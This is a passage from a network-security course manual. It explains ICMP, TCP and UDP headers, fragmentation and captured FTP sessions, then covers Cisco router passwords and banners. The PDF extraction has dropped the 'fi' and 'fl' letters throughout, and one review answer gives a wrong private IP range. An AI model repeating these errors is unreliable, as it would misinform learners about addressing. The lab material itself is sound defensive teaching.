the actual format of the ICMP message. There are only two rows of information
shown in the gure.
Figure 2-17: An ICMP message with all elds shown.
To work with ICMP further,
refer to RFC 792.
68 Tactical Perimeter Defense
Using Figure 2-17, we will move through the header, identifying the function of
each area. After identifying the header elds, we will use Network Monitor to
capture and analyze an ICMP message.
Starting on Row One, on the left side, the rst eld is called Type. This is
an 8-bit value that identies the specic ICMP message. For example, a
Type could be 3, which is a type of unreachable message.
Following Type on Row One is a eld called Code. This is an 8-bit value
that works in conjunction with Type to dene the specic details of the
ICMP message. For example, using Type 3, the Code could be 1, which is
destination host unreachable.
Moving along on Row One, the nal eld is called Checksum. This is a
16-bit value that checks the integrity of the entire ICMP message.
The Second Row has no xed elds. Depending on the Type and Code of
the ICMP message, this eld may contain many things. One example of
what may go in this eld is the time stamping of messages.
TASK 2D-1
Capturing and Identifying ICMP Messages
Setup: You are logged on to Windows Server 2003 as Administrator.
A command prompt and Network Monitor are running.
1. Begin a new capture.
2. Switch to the command prompt, and ping a valid IP address of another
host in your subnet. Wait for the ping to nish, and then minimize the
command prompt.
3. In Network Monitor, stop and view the capture.
4. Scroll down the packets captured to identify ICMP messages, or create
an ICMP lter.
5. Analyze the captured frames to identify the ping process between your
computer and the host you pinged.
6. Compare the messages to the discussion, looking for the following:
a. Source IP Address.
b. Destination IP Address.
c. Type.
d. Code.
e. Payload for ping.
7. Save this capture as Valid_Ping.cap and close it. You are going to run
another capture.
8. Begin a new capture.
Lesson 2: Advanced TCP/IP 69
9. Switch to the command prompt, ping a known invalid IP address for
your network, wait for the ping to nish, and minimize the command
prompt. For instance, if you were to ping the address 208.18.24.2, you
should receive a message indicating that the request timed out. Or, if you are
on the 172.16.10.0 network, you might try to ping the address 172.16.10.
201, as that address is unlikely to be in use on your network.
10. In Network Monitor, stop and view the capture.
11. Scroll down the packets captured to identify ICMP messages.
12. Analyze the captured frames, and compare them to the discussion, look-
ing for the following:
a. Source IP Address.
b. Destination IP Address.
c. Type.
d. Code.
13. Save this capture as icmpheader.cap and close.
Topic 2E
Capturing and Identifying TCP Headers
When investigating TCP/IP, you will nd that TCP data is encapsulated in the IP
datagram. Since you have already looked into the IP datagram itself, at this stage
you will examine TCP further. In Figure 2-18, you can see the actual format of
the TCP header. There are seven rows of information in the gure, with the criti-
cal ones for this discussion being the rst ve. Just as with IP, when a computer
receives the TCP header, it will begin reading on Row One on the left side, bit
by bit. Once it reads through Row One, it will read Row Two, and so on.
Figure 2-18: A TCP header with all elds shown.
Based on your network
environment, you may not
receive these ICMP
messages.
To work with TCP further,
refer to RFC 793.
70 Tactical Perimeter Defense
Using Figure 2-18, we will move through the header, identifying the function of
each area. After identifying the header elds, we will use Network Monitor to
capture and analyze the TCP header.
Starting on Row One, on the left side is a eld called Source Port Number.
This eld is a 16-bit number that denes the upper-layer application that is
using TCP on the source host.
The second eld on Row One is a eld called Destination Port Number. This
is a 16-bit eld that denes the upper-layer application that is using TCP on
the destination host. The combination of an IP address and a port number is
often called a socket. A socket pair identies both ends of a communication
completely, by using the host IP address and port, and the destination IP
address and port.
Moving onto Row Two, the entire row is a single eld called Sequence
Number. This is a 32-bit value that identies the unique sequence number of
this packet. The sequence numbers are used to track communication and are
part of the reason TCP is considered a connection-oriented protocol.
In Row Three, you can see that the entire row is also a single eld, called
Acknowledgement Number. This is a 32-bit value that provides a response to
a sequence number. Under normal operations, this value will be the value of
the sequence number of the last packet received in this line of communica-
tion, plus 1. There will be a value in this eld only if the ACK ag is turned
on (ags are in the next row).
Continuing on to Row Four, starting on the left side is a eld called Offset
(sometimes also called Header Length). This is a 4-bit value that denes the
size of the TCP header. Because this is a 4-bit value, the limit on the size of
the header is 60 bytes. If there are no options set, the size of the header is
20 bytes.
Moving to the right is a eld called Reserved. This is a 6-bit value that is
always left at 0 for functioning hosts using TCP/IP. It is not used for any
normal network traffic.
After the Reserved eld are the six Control Flags. Each ag is only 1 bit,
either on or off. There are six control ags, and they are listed as follows in
the left-to-right order they occupy in the TCP header:
URG: If this is a 1, the Urgent ag is set.
ACK: If this is a 1, the Acknowledgement ag is set.
PSH: If this is a 1, the Push ag is set.
RST: If this is a 1, the Reset ag is set.
SYN: If this is a 1, the Synchronize ag is set.
FIN: If this is a 1, the Finish ag is set.
For a detailed discussion on the ags and their functions, please review
that section earlier in this lesson.
Following the Control Flags on Row Four is a eld called Window Size.
This is a 16-bit value that identies the number of bytes, starting with the
one dened in the Acknowledgement eld, that the sender of this segment is
willing to accept.
Moving on to Row Five, on the left side, there is a eld called TCP
Checksum. This is a 16-bit value that is used to provide an integrity check
Lesson 2: Advanced TCP/IP 71
of the TCP header and the TCP data. The value is calculated by the sender,
then stored and the receiver compares the value upon receipt.
Following the TCP checksum on Row Five is a eld called Urgent Pointer.
This is a 16-bit value that is used if the sender must send emergency
information. The pointer points to the sequence number of the byte that fol-
lows the urgent data, and is only active if the URG ag has been set.
The Sixth Row has only one eld, called Options. This is a 32-bit value that
is often used to dene a maximum segment size (MSS). MSS is used so the
sender can inform the receiver of the maximum segment size that the sender
is going to receive on return communication. In the event that the options set
do not take up all 32 bits, padding will be added to ll the eld.
The Seventh and nal Row is the representation of the data. By this point,
the header is complete and the data the user wants to send or receive is
stored in the packet.
TASK 2E-1
Capturing and Identifying TCP Headers
Setup: You are logged on to Windows Server 2003 as Administrator.
A command prompt and Network Monitor are running.
1. Begin a new capture.
2. Switch to the command prompt and initiate a Telnet session to a neigh-
boring host.
3. To begin the Telnet session, type y, and press Enter
4. At the login prompt, type Administrator, leave the password blank, and
press Enter.
5. If the Telnet session starts, exit the Telnet session; otherwise, close the
command prompt.
6. Stop and view the capture.
7. Add a lter so that all you see are TCP frames. For the specic steps to
add lters, see Task 2B-1, step 12 through step 16.
8. Analyze the TCP headers in the frames.
9. When analyzing the headers, look for the following:
a. Sequence Numbers.
b. Acknowledgement Numbers.
c. Source Port Numbers.
d. Destination Port Numbers.
10. Once you have analyzed the header, save the capture as Telnet_Attempt.cap
and close the capture le.
72 Tactical Perimeter Defense
Topic 2F
Capturing and Identifying UDP Headers
Compared to TCP, UDP is a very simple transport protocol. The UDP header and
data will be completely encapsulated in the IP datagram, just as with TCP. In Fig-
ure 2-19, you can see the actual format of the UDP header. There are three rows
of information in the gure. Just as with TCP, when a computer receives the UDP
header, it will begin reading on Row One on the left side, bit by bit. Once it
reads through Row One, it will read Row Two, and so on.
Figure 2-19: A UDP header with all elds shown.
Using Figure 2-19, we will move through the header, identifying the function of
each area. After identifying the header elds, we will use Network Monitor to
capture and analyze the UDP header.
Starting on Row One, on the left side is a eld called Source Port Number.
This eld is a 16-bit value that denes the upper-layer application that is
using UDP on the source host.
The second eld on Row One is called Destination Port Number. This eld
is a 16-bit value that denes the upper-layer application that is using UDP
on the destination host.
On the Second Row, the eld on the left is called UDP Length. This is a
16-bit value that identies the length of the UDP data and the UDP header.
The second eld on Row Two is a eld called UDP Checksum. This is a
16-bit value that is used to provide an integrity check of the UDP header
and the UDP data. The value is calculated by the sender, then stored, and the
receiver compares the value upon receipt.
Row Three is where the actual user data is stored. It is possible for a user to
send a UDP datagram with zero bytes of data.
TASK 2F-1
Working with UDP Headers
Setup: You are logged on to Windows Server 2003 as Administrator,
and Network Monitor is running.
1. Browse to C:\Tools\Lesson2. In that folder is a le called tftp.cap. Open
tftp.cap in Network Monitor.
To work with UDP further,
refer to RFC 768.
Lesson 2: Advanced TCP/IP 73
2. Expand the details of any UDP frame, and compare it to the discussion.
Look for the following:
a. Source Port.
b. Destination Port.
c. What the actual UDP data is.
3. As you are analyzing this traffic, verify that no session was established, as
UDP is connectionless.
4. Close the capture.
Topic 2G
Analyzing Packet Fragmentation
Packet-switched networks will all, at one time or another, experience
fragmentation. This is due to the fact that all complex networks are made up of
various physical media and congurations. So, a packet of a certain size might t
ne on one segment, but may suddenly be many times larger than the capacity of
the next segment. The size limit that is allowed to exist on a network varies from
network to network and is referred to as the Maximum Transmission Unit
(MTU).
In the event that a datagram gets fragmented, it is not reassembled until it reaches
its nal destination. When the datagram is fragmented, each fragment becomes its
own unique packettransmitted and received uniquely.
TCP segments are sent using IP datagrams. TCP expects a one-to-one ratio of
segments to datagrams. Therefore, IP on the receiving end must completely reas-
semble the datagram before handing the segment to TCP. In the relationship
between TCP and IP, the following rules that affect fragmentation are dened:
The TCP Maximum Segment Size (MSS) is the IP Maximum Datagram Size
minus 40 octets.
The default IP Maximum Datagram Size is 576 octets.
The default TCP Maximum Segment Size is 536 octets.
Fragmentation will rarely happen at the source of a datagram, but it is possible.
For example, if a receiving host says it can accept segments that are many times
larger than what the sender normally sends. Another example would be a host on
a small-packet-sized network, such as PPP, and using an application with a xed-
size message.
The common location then for fragmentation is at a gateway, where the odds of
different MTUs on different interfaces are very high. The following list shows the
MTU for various media:
PPP: 296 bytes
Ethernet: 1500 bytes
FDDI: 4352 bytes
Token Ring (4 MB/s): 4464 bytes
Token Ring (16 MB/s): 17914 bytes
The ofcial minimum MTU is
68, and the maximum is
65535.
74 Tactical Perimeter Defense
Figure 2-20: How fragmentation works.
TASK 2G-1
Analyzing Fragmentation
Setup: You are logged on to Windows Server 2003 as Administrator,
and Network Monitor is running.
1. Navigate to C:\Tools\Lesson2 and open fragment.cap in Network
Monitor.
2. Expand the details of frame 1, looking for the Fragment ag.
3. Observe that, in frame 1, there is no Fragment Offset, as this is the rst
fragment.
4. Select several consecutive frames. Observe that each successive frame has
a higher Fragment Offset as it gets farther from the beginning of the original
datagram.
5. Observe that the IP ID stays constant for each fragment.
6. Expand the details of frame 16.
7. Observe that the Fragment ags are now both 0, indicating this is the last of
the fragments.
8. Close the capture.
Lesson 2: Advanced TCP/IP 75
Topic 2H
Analyzing an Entire Session
Now that you have analyzed IP, TCP, UDP, ICMP, fragmentation, handshakes,
and teardowns, it is time to put them together. In this topic, you will follow along
using two sample captures that were made specically for this purpose. One cap-
ture is a PING capture, and the other is an FTP capture. By analyzing them, you
will see how TCP/IP functionsfrom start to nish.
About the Tasks
In the following tasks, Windows Server 2003 Network Monitor was used to cap-
ture a ping between two hosts and an ftp session between two hosts. The ping
and ftp commands were run from the command prompt, and the output saved to
the text les ping.txt and ftp.txt, respectively. The Network Monitor captures
were saved to les ping.cap and ftp.cap, respectively. You can open the TXT les
with Notepad to see the commands and responses. You can open the CAP les
with Network Monitor and see the frames captured as a result. Lets take a look.
TASK 2H-1
Performing a Complete ICMP Session Analysis
Objective: To use the supplied capture and text les to examine the
TCP/IP headers, in order to understand how a session is set
up, used, and torn down.
Setup: You are logged on to Windows Server 2003 as Administrator,
and Network Monitor is running.
1. Start Notepad and open the le ping.txt. This le is in C:\Tools\Lesson2.
You should see the output shown in the following graphic.
2. Keep this le open.
3. Switch to Network Monitor, and open the le ping.cap. Its also located
in C:\Tools\Lesson2
76 Tactical Perimeter Defense
4. Observe that frame 1 is an Ethernet broadcast trying to resolve the target IP
address to its MAC address.
5. Observe that frame 2 is a reply from the target machine with the appropriate
resolution. From now on, the two hosts can communicate.
Lesson 2: Advanced TCP/IP 77
6. Observe the next two frames. They are ICMP echo messages going back and
forth between the two hosts, corresponding to the output in the text le.
Examine the ICMP messages, and see the details in frames 3 and 4 as
shown in the following graphics.
7. Observe that, for the ping command, no session was set up or torn down
just a simple ICMP echo request, followed by an ICMP echo reply.
8. Close ping.cap and ping.txt.
78 Tactical Perimeter Defense
Continuing the Complete Session Analysis
In the last task, one host successfully pinged another, in preparation for establish-
ing an FTP transaction. Well look at the FTP portion of the session, but before
we do, a quick differentiation between active and passive FTP is in order.
FTP Communication
Up to this point you have been examining ICMP communication. Now you will
examine an active FTP session. There are two different types of FTP, something
that many administrators are unfamiliar with. The two FTP types are simply
called passive and active.
The mode most people think of with FTP is active FTP. In active FTP, a client
makes a connection to the FTP server. The client uses a port higher than 1024
(well call it X) to connect to the server, which then uses port 21, and the FTP
command and control session is established. The server responds with the data
transfer, sent on port 20. The client will receive the data transfer on a port one
higher than the client used for command transfer, or X+1.
In passive mode FTP, the client initiates both connections between the client and
the server. When the FTP client begins an FTP session, the client opens two ports
(again one higher than 1024, and the next port higher, or X and X+1). The rst
connection and port is the session to the server for command and control on
server port 21. The server then opens a random port (again higher than 1024,
referred to as Y in this section), and sends this port information back to the
client. The client then requests the data transfer from client port X+1 to server
port Y.
When active FTP is used, there can be a situation that rewalls dislike. The rst
part of the FTP session, from client to server is not a problem. However, when
the server responds to the client, it can seem to the rewall to be a new session
started from an untrusted network, trying to gain access to the private network.
Passive FTP solves this problem on the rewall, as both parts of the FTP session
originate from the FTP client, and no session starts from an untrusted network.
There is a different problem with passive FTP. This problem is not on the
rewall, but on the server conguration itself. Because the FTP client starts both
sessions, the FTP server must be able to listen on any high port, meaning all high
ports must be open and available. To deal with this situation, many FTP applica-
tions now include features that limit the port range that the server can use.
Lesson 2: Advanced TCP/IP 79
TASK 2H-2
Performing a Complete FTP Session Analysis
Objective: To use the supplied capture and text les to examine the
TCP/IP headers, in order to understand how a session is set
up, used, and torn down.
Setup: You are logged on to Windows Server 2003 as Administrator.
Notepad and Network Monitor are running.
1. Switch to Notepad and open ftp.txt. This le is located in C:\Tools\
Lesson2. You should see the results shown in the following graphic.
2. Observe that, in this session, when the ftp server asks for a password, the
user enters it but it is not recorded on screen.
80 Tactical Perimeter Defense
3. Switch to Network Monitor, and open ftp.cap in C:\Tools\Lesson2. You
should see results similar to those shown in the following graphics. (Depend-
ing on the version of Network Monitor you are using, MAC and IP
addresses might be displayed in Hex, and the time might be in a different
format.)
There are 51 frames involved in this capture.
4. If you would like to change the color of the FTP packets for easier viewing,
choose DisplayColors. Scroll down and select FTP; then, from the
Background drop-down list, select a mild color such as gray or teal, and
click OK. If you select a darker color, it might make it more difficult to read
the text.
If you would like to change
the format of the addresses
from Hex to more readable
names, choose Display
Addresses, and click Add. In
the box that is displayed,
enter FTPSITE for the Name,
add 002B32CFC72 for the
Address, verify that the Type
is Ethernet, and click OK.
Click Add again, then enter
LOCAL for the Name, add
0002B32C5B13 for the
Address, verify that the Type
is Ethernet, and click OK
twice.
Lesson 2: Advanced TCP/IP 81
5. Observe that frames 3, 4, and 5 represent the TCP handshake involved in
establishing the session. Frames shaded gray (6, 8-9, 11-12, 14, 16-19, 23,
29, 31-34, 38, 44, and 46-47) are all directly involved with the ftp
applicationauthentication, ftp requests for directory information, an actual
le transfer, followed by a quit, and bye response.
6. Observe that in frame 8, you can see the user name being supplied.
7. Observe that in frame 9, you can see the request for a password.
8. Observe that in frame 11, you can see the password being supplied. Isnt this
a good enough reason to employ some secure authentication such as encryp-
tion?
9. Lets view the three-way handshake frames in a bit more detail.
Frame 3 starts the three-way handshake Active Open by setting the SYN bit
to 1, offering source port no. 2025 (07E9 in Hex), while at the same time
directing the request to port number 21 (15 in Hex) on the server. A
sequence number 2052360112 (7A5487B0 in Hex) is associated with this
frame to uniquely identify it, even in the event of multiple sessions between
the same two hosts.
82 Tactical Perimeter Defense
10. Lets look at the reply.
The reply from the ftp server in frame 4 includes an ACK, while simulta-
neously including a SYN. This is the Passive Open.
11. Observe that frame 5 includes an ACK from the client.
Once the session is established, FTP can continue on with its setup. This
includes a login and a password (to be supplied if anonymous access in not
supported), followed by le requests.
Lesson 2: Advanced TCP/IP 83
12. Observe that frame 6 shows the ftp server asking for user identication.
Frame 8 shows the ftp client supplying the user name of test user.
13. Observe that this is met by the ftp server asking for the password in frame
9.
84 Tactical Perimeter Defense
14. Observe that in frame 11, you can see the password being offered. Because
no secure methods for authentication were set up, you can see the actual
password (the word plaintext).
15. Observe that once the user has been authenticated, the ftp session is allowed
to continue. The ftp server puts out the welcome message shown in frame
12.
Lesson 2: Advanced TCP/IP 85
16. Observe that the rest of the frames dealing with FTPframes 14, 16-19, 23,
29, 31-34, 38, and 44have to do with directory listings and le transfers.
86 Tactical Perimeter Defense
Lesson 2: Advanced TCP/IP 87
17. Observe that in frame 38, you can see the actual contents of the le as it is
being transferred In this case, and because it is just a text le, you can read
the contents.
18. Observe that in frame 46, you can see the client attempt to close the connec-
tion with the Quit command.
88 Tactical Perimeter Defense
19. Observe that in frame 47, you can see the server communicate with the cli-
ent with the message See ya later.
Lesson 2: Advanced TCP/IP 89
20. Observe that these messages are followed by TCP terminating the session
from both ends in frames 48 and 49, and 50 and 51, respectively, where the
FIN bits are set to 1 and the corresponding frame contains the ACK bit set
to 1.
90 Tactical Perimeter Defense
21. Close Network Monitor. If you are prompted to save addresses, click No.
22. Close Notepad.
Lesson 2: Advanced TCP/IP 91
Summary
In this lesson, you looked deep into the structure of the TCP/IP protocol.
You reviewed the RFCs associated with IP, ICMP, TCP, and UDP. You then
used Network Monitor and Wireshark to capture and analyze IP packets.
You examined captures associated with network traffic. You learned to read
the actual data being transmitted between two or more hosts. Finally, you
analyzed a complete session, frame-by-frame.
Lesson Review
2A How many layers are in the OSI Model?
Seven.
How many layers are in the TCP/IP Model?
Four.
What are the assignable classes of IP addresses?
A, B, and C.
What are the three private ranges of IP addresses, as dened in the
RFCs?
a. 10.0.0.0 to 10.255.255.255
b. 172.16.0.0 to 172.131.255.255
c. 192.168.0.0 to 192.168.255.255
2B How many control ags are in a TCP header?
Six.
What is the function of an acknowledgement number?
To provide an acknowledgement for a received packet. The value is usually
tied into the SYN number on the received packet.
How many steps are required to establish a TCP connection?
Three.
How many steps are required to tear down a TCP connection?
Four.
What are the two main views of Network Monitor?
Display View and Capture View.
2C What is the rst eld that is read by the computer in the IP header?
Version.
92 Tactical Perimeter Defense
What is the Protocol ID of ICMP in the IP header?
1.
What is the Protocol ID of TCP in the IP header?
6.
What is the Protocol ID of UDP in the IP header?
17.
2D What is the rst eld that is read by the computer in the ICMP mes-
sage?
Type.
How many bits make up the Type eld?
Eight.
How many bits make up the Code eld?
Eight.
2E What is the rst eld that is read by the computer in the TCP header?
Source Port Number.
How many control bits are in the TCP header?
Six.
How many bits is the Sequence Number?
32.
How many bits is the Acknowledgement Number?
32.
2F What is the rst eld that is read by the computer in the UDP header?
Source Port Number.
What is the UDP header and data encapsulated in?
An IP datagram.
How many bits are both the source and destination port numbers?
16.
What is in the payload of the tftp.cap le that you analyzed?
Cisco Router Conguration and Access Lists.
2G In the fragment.cap le that you analyzed, how do you suppose this
fragmentation happened?
By a user sending a large ping. (See the le fragment.txt, in the same folder
as fragment.cap, to understand how this was initiated.)
Lesson 2: Advanced TCP/IP 93
Why is there no upper-layer protocol list in the Detail pane for frames 2
through 13?
These are the subsequent fragments whose upper-layer protocol is referred
to in the rst fragment; therefore, they do not have any header information
other than IP.
What was the upper-layer protocol that caused the fragmentation?
ICMP.
2H In the FTP capture le that you analyzed in this topic, what pair of
sockets are involved in the initial three-way handshake?
On the client: IP address 172.16.30.2, port 2025. On the FTP Server: IP
address 172.16.30.1, port 21.
In the FTP capture le that you analyzed in this topic, what pair of
sockets are involved in the exchange of FTP data in response to the
request for directory listing?
On the FTP Server: IP address 172.16.30.1, port 20. On the client: IP
address 172.16.30.2, port 2026.
In the FTP capture le that you analyzed in this topic, what frames
indicate that a three-way handshake is taking place between the FTP
server and the client in preparation for the sending of FTP data in
response to the request for the le textle.txt?
Frames 35, 36, and 37.
94 Tactical Perimeter Defense
Routers and Access Control
Lists
Overview
In this lesson, you will be introduced to the functioning of routers and rout-
ing protocols. The examples in this lesson are shown on Cisco Routers,
specically the 2500 series. You will examine the issues of securing routers
and routing protocols. You will remove unneeded services and create access
control lists to manage and secure the network. The lesson ends with the
creation of logging options on the Cisco router.
Objectives
To understand the functions of routers and routing protocols, you will:
3A Congure fundamental router security.
You will create the required congurations to secure connections, create
banners, and implement SSH.
3B Examine principles of routing.
You will capture routing protocols and analyze the IP and MAC relation-
ship in a routed environment.
3C Congure the removal of services and protocols.
You will create the required congurations to harden the core services
and protocols on a Cisco router.
3D Examine the function of Access Control Lists on a Cisco router.
You will create wildcard masks to be used in conjunction with the imple-
mentation of Access Control Lists.
3E Implement Cisco Access Control Lists.
You will create the required congurations to implement Access Control
Lists to defend against network attacks on a Cisco router.
3F Congure logging on a Cisco router.
You will create the required congurations to enable logging on a Cisco
router.
Data Files
ping-arp-mac.cap
rip update.cap
ripv2withAuthentication.
cap
PuTTy.exe
Lesson Time
6 hours
LESSON
3
Lesson 3: Routers and Access Control Lists 95
Topic 3A
Fundamental Cisco Security
Although this lesson is not designed to make you a Cisco or a routing expert, you
will become familiar with the core functions of routers and how to best harden
this critical component of the infrastructure.
Cisco Router Language
A Cisco router has one or more connections to networks. Each of these connec-
tions is referred to as an interface. To further dene this interface concept, Cisco
uses the type of interface as part of the name as well. Therefore:
An interface that is connected to an Ethernet segment of the network always
starts with an E.
A Fast Ethernet interface always starts with an F.
An interface that is connected to a serial connection always starts with an S.
An interface that is connected to a Token Ring segment always starts with
To.
Along with the interface type, Cisco routers are numbered. The interface number-
ing begins with a zero. In other words:
The rst Ethernet interface on the router is known as E0.
Likewise, the rst serial interface on the router is S0.
Finally, the rst Token Ring interface on the router is To0.
Cisco Operating System
The Cisco routers have their own operating system, which is known as the IOS
(Internetworking Operating System). The IOS is found on all Cisco routers and
can be uploaded to or downloaded from a tftp site. It is common to copy the IOS
image to the tftp location as a quick backup in the event that the running IOS
gets corrupted.
Most of the current routers in production are running versions 11.x or 12.x of the
Cisco IOS. When Cisco makes a major release of the IOS, it is assigned a num-
ber, such as 11 or 12. Major releases can also be added to the numbers, such as
11.2 or 12.2. You might also see an IOS listed as version 12.0(3). The 3 in paren-
thesis is the third maintenance revision of the major release. Maintenance
revisions are released every eight weeks and contain bug xes and/or updates, as
Cisco dictates.
Accessing the Router
Cisco provides a wide variety of access points for their routers. Each method of
access can provide the ability to view the router differently. Some methods
require the network to be functioning and active, while others do not require any
network connectivity at all. The methods of access include the console port, the
auxiliary port, or network access. Network access can, in turn, include VTY (ter-
minal access), HTTP, TFTP, and SNMP. Each of these methods is detailed here:
The console port is the main point of access on a Cisco router. This is a
direct physical connection, requiring the router to be in the presence of the
person using the port. This is the connection method used to create the ini-
bug:
An unwanted and unintended
property of a program or
piece of hardware, especially
one that causes it to
malfunction.
SNMP:
(Simple Network
Management Protocol)
Software used to control
network communications
devices using TCP/IP.
96 Tactical Perimeter Defense
tial conguration and in the event of an emergency, such as password
recovery. Because it has direct physical access, the console port should not
be the primary method of accessing the router.
The auxiliary port can be used to connect to the router via a modem. This
can be a functional method of accessing the router if the primary network is
down and you are not able to gain physical access to the router.
The VTY sessions provide for terminal access to the router. These connec-
tions require the network to be functioning to provide access. The most
common method of accessing a VTY session is telnet, althoughfor security
purposesSSH is supported, and is recommended. There are ve VTY ports
on the router by default, and they are numbered 0 though 4. In this course,
access will be provided by using VTY sessions.
Other network access points like HTTP, TFTP, and SNMP are also supported
on newer versions of the IOS. HTTP can be used if the router runs as a web
server, authenticating users for access. TFTP is used for loading IOS and
conguration les, and SNMP can be used in full network management
congurations.
Modes of Operation
In the router, there are several different modes an administrator can use. These
range from simple, informational modes, to the complex modes of router
conguration. There are several examples of the different modes listed below:
User Mode: In this mode, users can see the conguration of the router, but
will not be able to make any signicant changes to the router. The prompt
for User Mode looks like this: Router>.
Enable Mode: In this mode, users can make more signicant changes to the
router, including some of the router conguration options. The prompt for
Enable Mode looks like this: Router#.
Global Conguration Mode (also known as Congure Terminal Mode): In
this mode, users can make conguration changes that will affect the entire
router. The prompt for Global Mode looks like this: Router(config)#.
Generally, once you connect to the router, you will move to Enable Mode right
away, since that is where much of the router management happens. As a side
note, Enable Mode is often called Privileged Mode in text. So, you can consider
Enable Mode and Privileged Mode to mean the same thingthe next level of
router access beyond User Mode.
Configuration Fragments
In this lesson, you will see many examples of congurations of the router. It is
not practical to list every step and every line entered for every option. Therefore,
what you will see are called conguration fragments.
For example, to navigate to an Interface Mode of a router, the following com-
mands are required:
1. Connect to the router via an access method, such as telnet: Telnet 10.10.10.
10.
2. Enter the password for VTY access: L3tm3!n.
3. Enter the password for Enable Mode: P0w3r.
4. Enter the command for Congure Terminal Mode: Congure Terminal.
5. Enter the command for Interface Mode: Interface Ethernet 0.
Lesson 3: Routers and Access Control Lists 97
In this course, the command sequence listed previously will not be described line-
by-line but with a conguration fragment. So, the steps to access Interface Mode
will look like this:
1. Router#Config Terminal
2. Router(Config)#Interface Ethernet0
This conguration fragment goes right to the concept, or function, of the
discussion. In this example, you cannot be in Enable Mode (identied by the
Router# prompt), without rst accessing the router (probably by using Telnet),
and entering the required credentials.
Navigating in the Router
The Cisco router interface is a command-line interface, with a format that is simi-
lar to UNIX. For those of you getting started with the router, if you get lost in
the command structure, here are some of the more common commands to learn
and use.
First is the question mark (?).
This simple single character command will list for you all the available
options at a given point in the router. For example, if you enter the
question mark at the User Mode prompt, like so: Router>?, you will
be given an alphabetical list of the commands that are options at this
point. This command will yield a different set of commands than using
the same question mark at the Enable Mode prompt (Router#?).
If you recall the rst letter of a command, but not the entire string,
again the question mark can come in handy. For example, if you are
trying to enter Enable Mode, but forgot how to spell enable, you can
use the following command: Router>E? This command lists all the
commands starting with the letter E with brief descriptions of their
functions.
Other shortcuts to use are the Up Arrow and Down Arrow keys. Using these
will scroll you through commands you have entered into the router for quick
access.
Finally, using key combinations can be helpful as well. Two examples of key
combinations are Ctrl+A and Ctrl+E.
Using the Ctrl+A key combination moves the cursor to the beginning of
a command line.
Using the Ctrl+E key combination moves the cursor to the end of a
command line.
As an FYI, if the Up Arrow and Down Arrow keys do not function on your
system, you can use the key combination Ctrl+P in place of the Up Arrow
key, and Ctrl+N in place of the Down Arrow key.
Authentication and Authorization
In order for someone to have access to control a router, there must be both
authentication and authorization. It is important to not get these two confused, as
they are so similar. Authentication is the process of identifying a user, generally
granting or denying access. Authorization is the process of dening what a user
can do or is authorized to do. So, a user gains access to the router via authentica-
tion and gains control of the router via authorization.
98 Tactical Perimeter Defense
In Cisco routers, there are two main categories of authentication. They are the
AAA method and the non-AAA method (called traditional by some). AAA stands
for Authentication, Authorization, and Accounting.
Earlier, you were introduced to the methods of access, such as console, aux-
iliary, and VTY sessions. These are considered non-AAA access methods.
Another non-AAA access method is called Terminal Access Controller
Access Control System, or TACACS for short. They use a local username
and password for authentication.
AAA methods include RADIUS and Kerberos. These methods provide for
the full level of Authentication, Authorization, and Accounting that are
required for AAA access methods.
Configuring Access Passwords
Because there are several different methods of accessing the router, in order to
provide security, you must be able to lock down these access points. The rst line
of defense is to provide a password for these forms of access.
Setting the Console Password
Because the console-port connection is used for direct access, it must have a
strong password. This can be, and usually is, created during the initial setup of
the router. In order to set the Console password, you will need to enter Congure
Terminal Mode, and then enter the command line console 0. This is what
gets you into the mode where the password can be created. The login command
tells the router that a password is required, and the password command is used to
enter the actual password. The conguration fragment looks like this:
Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
Setting the Enable Passwords
The process for setting the Enable password is similar to the process for setting
the Console password. And, you will notice the process for the following sections
are all similar, only the object (such as the console or vty) is the difference.
As to the password itself, there are two different Enable passwords. The rst is
the standard Enable password; the second is the Enable Secret password. The
standard Enable password is used only for backwards compatibility. If the Enable
Secret password has been congured, it will take precedence. The reason that the
Enable Secret password is used over the standard Enable password is that the
Enable Secret password is encrypted and cannot be read in plaintext in the router.
The conguration fragment for setting the Enable Secret password looks like this:
Router#config terminal
Router(config)#enable secret p@55w0rd
Router(config)#login
Router(config)#^Z
Router#
Lesson 3: Routers and Access Control Lists 99
Setting the VTY Password
Conguration of the password for the VTY sessions are similar to creating the
Console password. Remember that there are ve VTY sessions, numbered 0
through 4. When you are setting the VTY password, you can create a password
for one or for all of these sessions. In this rst conguration fragment, the pass-
word is set for just the rst VTY session:
Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router
In the following conguration fragment, the password is set for all VTY sessions,
0 through 4. Note that the process is nearly identical.
Router#config terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router
TASK 3A-1
Configuring Passwords
1. Create the conguration fragment that you would use to set the Console
password of ACC3$$, and to set all VTY sessions to use the password of
+3ln3+.
Router#configure terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password ACC3$$
Router(config-line)#^Z
Router#
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password +3ln3+
Router(config-line)#^Z
Router#
Creating User Accounts
Although for regular operation of the router, individual user accounts are not
required, when you do add them, it allows for another level of control over the
router and over router access.
To create local user accounts, the command syntax is only one line. In organiza-
tions where there are multiple people managing the router, this is a solid practice.
The following conguration fragment shows the creation of several user accounts:
100 Tactical Perimeter Defense
Router#configure terminal
Router(conf)#username Auser password u$3r1
Router(conf)#username Buser password u$3r2
Router(conf)#username Cuser password u$3r3
Router(conf)#username Duser password u$3r4
Router(conf)#^Z
Router#
Implementing Banners
In addition to having proper passwords on the router, it is important to have
adequate warning banners. It is highly recommended that you view these banners
as warning banners and not as welcome banners, as they used to be called. A
warning banner is not designed to be the end-all of security; most people know a
banner will not stop a determined attacker. However, a banner can provide some
legal backing for you and your organization.
There are four general functions that warning banners should provide. Although
you should look to legal counsel for the exact wording, your banner should
address each of these. The banner should:
Not provide useful technical or non-technical information that an attacker
can use.
Inform users of the system(s) that their actions are subject to recording, and
may be used in a court of law.
Dene who is and who is not an authorized user of the system(s).
Provide adequate legal standing to both prosecute offenders and protect the
administrators of the equipment.
The following is an example of what a banner could look like for an organiza-
tion:
Warning!!! This system is designed solely for the authorized
users of Company X on official business. Users of this system
understand that there is no expectation of privacy, and that use
of the system may be monitored and recorded. Use of this system
is consent to said monitoring and recording. Users of this
system acknowledge that if monitoring finds evidence of misuse,
abuse, and/or criminal activity, that system operators may
provide monitoring and recording data to law enforcement
officials.
